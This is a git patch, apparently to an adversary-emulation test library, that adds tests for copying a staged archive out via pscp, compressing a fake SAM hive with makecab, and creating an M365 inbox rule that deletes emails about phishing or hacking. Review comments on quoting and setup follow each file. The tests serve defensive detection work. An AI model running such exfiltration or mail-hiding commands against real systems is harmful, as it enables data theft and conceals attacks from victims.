From 2e9bea8316becd8a32b3873adb4861b666a0da86 Mon Sep 17 00:00:00 2001 From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com> Date: Wed, 25 Sep 2024 07:42:55 +1000 Subject: [PATCH] Blueteam0ps 31072024 (#2902) * Update T1560.001.yaml * Create T1564.008.yaml * Update T1105.yaml * Update T1560.001.yaml Added back elevation_required: true to the previous test as it was mistakenly removed. * Update T1105.yaml Fixed up errors * Update T1560.001.yaml removed addition elevation_required option * Update T1560.001.yaml Fixed the issues based on the feedback --- atomics/T1105/T1105.yaml | 56 ++++++++++++++++++++++++++++++++ atomics/T1560.001/T1560.001.yaml | 32 ++++++++++++++++-- atomics/T1564.008/T1564.008.yaml | 50 ++++++++++++++++++++++++++++ 3 files changed, 136 insertions(+), 2 deletions(-) create mode 100644 atomics/T1564.008/T1564.008.yaml
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index f3e1e911..8add7f04 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -920,3 +920,59 @@ atomic_tests:
 cleanup_command: rm "#{local_file_path}" 2>$null | Out-Null
 name: powershell
 elevation_required: true
+- name: Remote File Copy using PSCP
+ auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe
+ description: |
+ Copy a staged file using PSCP.exe to a public target location.
+ supported_platforms:
+ - windows
+ input_arguments:
+ pscp_url:
+ description: pscp.exe download path
+ type: string
+ default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe
+ pscp_binary:
+ description: PSCP binary location
+ type: string
+ default: 'PathToAtomicsFolder\..\ExternalPayloads\pscp.exe'
+ scp_user:
+ description: Username of the SCP user
+ type: string
+ default: 'atomic'
+ scp_password:
+ description: Password for the SCP User
+ type: string
+ default: 'atomic'
+ scp_port:
+ description: port for the remote server
+ type: string
+ default: '22'
+ exfil_package:
+ description: path to exfil package
+ type: path
+ default: 'C:\Temp\T1105_scp.zip'
+ target_location:
+ description: Remote location where the data will be copied to.
+ type: string
+ default: 127.0.0.1
+ target_filename:
+ description: Filename on the destination.
+ type: string
+ default: T1105_scp.zip
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ pscp.exe must be available on the system.
+ prereq_command: |
+ if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+ Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
+ executor:
+ command: |
+ fsutil file createnew C:\Temp\T1105_scp.zip 1048576
+ echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
+ cleanup_command: |
+ del /f /q #{exfil_package}
+ name: command_prompt
+ elevation_required: false
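Review bot: The staging line in `command` hardcodes `C:\Temp\T1105_scp.zip` while the pscp line and `cleanup_command` use `#{exfil_package}`, so a non-default `exfil_package` is never created yet is still deleted; use `fsutil file createnew "#{exfil_package}" 1048576`. The same pattern appears in the T1560.001.yaml hunk, where `get_prereq_command` creates `c:\Temp\sam.hiv` instead of `#{input_file}`. Both also assume `C:\Temp` already exists, which `fsutil` does not create; a prerequisite such as `if not exist C:\Temp mkdir C:\Temp` would make the tests self-contained. The description says the file goes "to a public target location", but the default `target_location` is `127.0.0.1` and nothing provisions an SCP listener, so stating that an operator-supplied server reachable with `scp_user`/`scp_password` is required would set expectations, and since `-pw` puts that password on the command line it will appear in process-creation telemetry, which is worth noting so nobody reuses real credentials. The `atomic_tests` list this entry appends to starts above the hunk.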
diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml
index a71b8351..8826a74d 100644
--- a/atomics/T1560.001/T1560.001.yaml
+++ b/atomics/T1560.001/T1560.001.yaml
@@ -383,5 +383,33 @@ atomic_tests:
 rm c:\temp\loghost.txt
 name: powershell
 elevation_required: true
-
-
\ No newline at end of file
+- name: Compress a File for Exfiltration using Makecab
+ auto_generated_guid: 2a7bc405-9555-4f49-ace2-b2ae2941d629
+ description: |
+ An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration.
+ [reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/)
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_file:
+ description: Path to source file for compression
+ type: path
+ default: 'C:\Temp\sam.hiv'
+ output_file:
+ description: Path of the CAB file
+ type: path
+ default: 'C:\Temp\art.zip'
+ dependencies:
+ - description: |
+ A sample file for compression must be located at specified location (#{input_file})
+ prereq_command: |
+ if not exist "#{input_file}" (exit /b 1)
+ get_prereq_command: |
+ fsutil file createnew c:\Temp\sam.hiv 10485760
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ makecab.exe #{input_file} #{output_file}
+ cleanup_command: |
+ del #{output_file}
diff --git a/atomics/T1564.008/T1564.008.yaml b/atomics/T1564.008/T1564.008.yaml
new file mode 100644
index 00000000..a65dee21
--- /dev/null
+++ b/atomics/T1564.008/T1564.008.yaml
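Review bot: `#{input_file}` and `#{output_file}` are interpolated unquoted into `makecab.exe #{input_file} #{output_file}` and `del #{output_file}`, so any path containing a space splits into extra arguments; quote them, `makecab.exe "#{input_file}" "#{output_file}"` and `del /f /q "#{output_file}"`, which also matches the `del /f /q` form used in the T1105.yaml hunk. The `output_file` default `C:\Temp\art.zip` gives a CAB archive a `.zip` extension while the argument's description reads "Path of the CAB file"; either use a `.cab` default or say in the description that the mismatched extension is deliberate. The `atomic_tests` list this entry appends to starts above the hunk.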
@@ -0,0 +1,50 @@
+attack_technique: T1564.008
+display_name: 'Hide Artifacts: Email Hiding Rules'
+atomic_tests:
+- name: New-Inbox Rule to Hide E-mail in M365
+ auto_generated_guid: 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9
+ description: |
+ This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body.
+ Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ auth_username:
+ description: M365 Username
+ type: string
+ default: john@contoso.com
+ auth_password:
+ description: M365 Password
+ type: string
+ default: p4sswd
+ mail_rulename:
+ description: Name of the inbox rule.
+ type: string
+ default: default
+ target_mailbox:
+ description: Mailbox you are creating the rule in
+ type: string
+ default: jane@contoso.com
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ ExchangeOnlineManagement module must be installed.
+ prereq_command: |
+ try {if (Get-InstalledModule -Name ExchangeOnlineManagement -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+ get_prereq_command: |
+ Install-Module -Name ExchangeOnlineManagement -Force
+ executor:
+ command: |
+ Import-Module ExchangeOnlineManagement
+ $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+ $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+ Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
+ New-InboxRule -Mailbox #{target_mailbox} -Name #{mail_rulename} -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true
+ cleanup_command: |
+ Import-Module ExchangeOnlineManagement
+ $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+ $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+ Connect-ExchangeOnline -Credential $credential
+ Remove-InboxRule -Mailbox #{target_mailbox} -Identity #{mail_rulename} -Confirm:$false
+ name: powershell
+ elevation_required: false
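Review bot: `Connect-ExchangeOnline` in `command` is run with `-ErrorAction:SilentlyContinue`, so a failed sign-in (wrong password, interactive MFA, missing consent) is swallowed and the test then fails on `New-InboxRule` with a misleading error, while the same call in `cleanup_command` has no suppression; drop the flag so the connection failure is the one reported, `Connect-ExchangeOnline -Credential $credential`. `#{target_mailbox}` and `#{mail_rulename}` are interpolated unquoted into `New-InboxRule` and `Remove-InboxRule`, so a rule name containing a space splits into extra arguments; quote them, e.g. `New-InboxRule -Mailbox "#{target_mailbox}" -Name "#{mail_rulename}" ...` and likewise in the cleanup. Neither executor ends the session; a closing `Disconnect-ExchangeOnline -Confirm:$false` would avoid carrying the authenticated session into later tests. The description speaks of "specific keywords" but the list `("phish","malware","hacked")` is fixed in the command, so either expose it as an input argument or name the words in the description. `supported_platforms` lists `azure-ad` although the test acts on Exchange Online mailboxes; check whether the project's `office-365` platform tag is the intended one.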